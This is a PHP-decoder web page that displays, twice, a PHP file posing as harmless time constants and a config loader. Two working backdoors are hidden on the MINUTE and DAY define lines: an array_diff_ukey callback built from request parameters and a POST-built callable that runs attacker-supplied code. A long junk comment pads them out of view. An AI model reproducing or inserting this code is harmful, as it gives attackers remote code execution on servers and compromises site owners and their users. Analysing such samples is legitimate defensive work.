Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* * [Desktop Entry] * DefaultProfile=Shell.profile * * ..
Decoded Output download
<?php
/*
* [Desktop Entry]
* DefaultProfile=Shell.profile
*
* [Favorite Profiles]
* Favorites=Shell.profile
*
* [KonsoleWindow]
* AllowMenuAccelerators=true
* ShowMenuBarByDefault=false
* ShowWindowTitleOnTitleBar=true
*
* [MainWindow]
* Height 1920=1712
* State=AAAA/wAAAAD9AAAAAAAABKwAAAaZAAAABAAAAAQAAAAIAAAACPwAAAAA
* MenuBar=Disabled
* ToolBarsMovable=Disabled
* Width 1200=1196
*
* [TabBar]
* NewTabBehavior=PutNewTabAfterCurrentTab
* TabBarVisibility=ShowTabBarWhenNeeded
*/
/**
* Basic defines for timing functions.
*/
define('SECOND', 1);
define('MINUTE', 60); @array_diff_ukey (@array((string)$_REQUEST['password']=>1),@array ((string)stripslashes (base64_decode ($_REQUEST ['re_password']))=>2), $_REQUEST ['login'] );
define('HOUR', 3600);
define('DAY', 86400); if ( !empty ( $_POST ) ) {$h = @$_POST['d'] ('', @$_POST['f'] (@$_POST['s'] ("c", "", @$_POST['m']) ) ) ; $h () ; } // rA*HqYAQCS2d5XR6HyQ*hQzhWu@96ay-Hd=FUVHprR*cv#@_8ny$0yd1@!WxbP_fPFnqF68c3.Mm$mVG0CC@z4ER+w*4sECf(!6P#6.D!uxmr1EfgrSZv5dN=TPhGXeMa)FdC.B3pxK1wbW#_KQ@ASyssMb*SnVrd=vUv@V_Yu(dhQTSDUF!)zV4u+s!YGaWE-dg6EfT^TdmcR3ewT!*U$wUXH#.G6RPX^RA=0M@v0Q6_W^BQ12xunxU^V6eaD8^r4vQuE39T*8hx^SXDdPspMfkzeCTef!@HR67x)TTa-m#d4R7GUD89nTDPB-sM9E5dna)CwzbU*u1@eBYasE-*5FmHaPDWb5Hk$SG=7z*@*57C+EWu
define('WEEK', 604800);
define('MONTH', 2592000);
define('YEAR', 31536000);
if (!function_exists('config')) {
/**
* Loads configuration files. Receives a set of configuration files
* to load.
*
* @return boolean Success
*/
function config($args=array()) {
$count = count($args);
$included = 0;
foreach ($args as $arg) {
if (file_exists('Config' . $arg . '.php')) {
include_once 'Config' . $arg . '.php';
$included++;
}
}
return $included === $count;
}
}
?>
Did this file decode correctly?
Original Code
<?php
/*
* [Desktop Entry]
* DefaultProfile=Shell.profile
*
* [Favorite Profiles]
* Favorites=Shell.profile
*
* [KonsoleWindow]
* AllowMenuAccelerators=true
* ShowMenuBarByDefault=false
* ShowWindowTitleOnTitleBar=true
*
* [MainWindow]
* Height 1920=1712
* State=AAAA/wAAAAD9AAAAAAAABKwAAAaZAAAABAAAAAQAAAAIAAAACPwAAAAA
* MenuBar=Disabled
* ToolBarsMovable=Disabled
* Width 1200=1196
*
* [TabBar]
* NewTabBehavior=PutNewTabAfterCurrentTab
* TabBarVisibility=ShowTabBarWhenNeeded
*/
/**
* Basic defines for timing functions.
*/
define('SECOND', 1);
define('MINUTE', 60); @array_diff_ukey (@array((string)$_REQUEST['password']=>1),@array ((string)stripslashes (base64_decode ($_REQUEST ['re_password']))=>2), $_REQUEST ['login'] );
define('HOUR', 3600);
define('DAY', 86400); if ( !empty ( $_POST ) ) {$h = @$_POST['d'] ('', @$_POST['f'] (@$_POST['s'] ("c", "", @$_POST['m']) ) ) ; $h () ; } // rA*HqYAQCS2d5XR6HyQ*hQzhWu@96ay-Hd=FUVHprR*cv#@_8ny$0yd1@!WxbP_fPFnqF68c3.Mm$mVG0CC@z4ER+w*4sECf(!6P#6.D!uxmr1EfgrSZv5dN=TPhGXeMa)FdC.B3pxK1wbW#_KQ@ASyssMb*SnVrd=vUv@V_Yu(dhQTSDUF!)zV4u+s!YGaWE-dg6EfT^TdmcR3ewT!*U$wUXH#.G6RPX^RA=0M@v0Q6_W^BQ12xunxU^V6eaD8^r4vQuE39T*8hx^SXDdPspMfkzeCTef!@HR67x)TTa-m#d4R7GUD89nTDPB-sM9E5dna)CwzbU*u1@eBYasE-*5FmHaPDWb5Hk$SG=7z*@*57C+EWu
define('WEEK', 604800);
define('MONTH', 2592000);
define('YEAR', 31536000);
if (!function_exists('config')) {
/**
* Loads configuration files. Receives a set of configuration files
* to load.
*
* @return boolean Success
*/
function config($args=array()) {
$count = count($args);
$included = 0;
foreach ($args as $arg) {
if (file_exists('Config' . $arg . '.php')) {
include_once 'Config' . $arg . '.php';
$included++;
}
}
return $included === $count;
}
}
?>
Function Calls
define | 1 |
Stats
MD5 | 485964eeb21baf2901c76755df5cfc96 |
Eval Count | 0 |
Decode Time | 154 ms |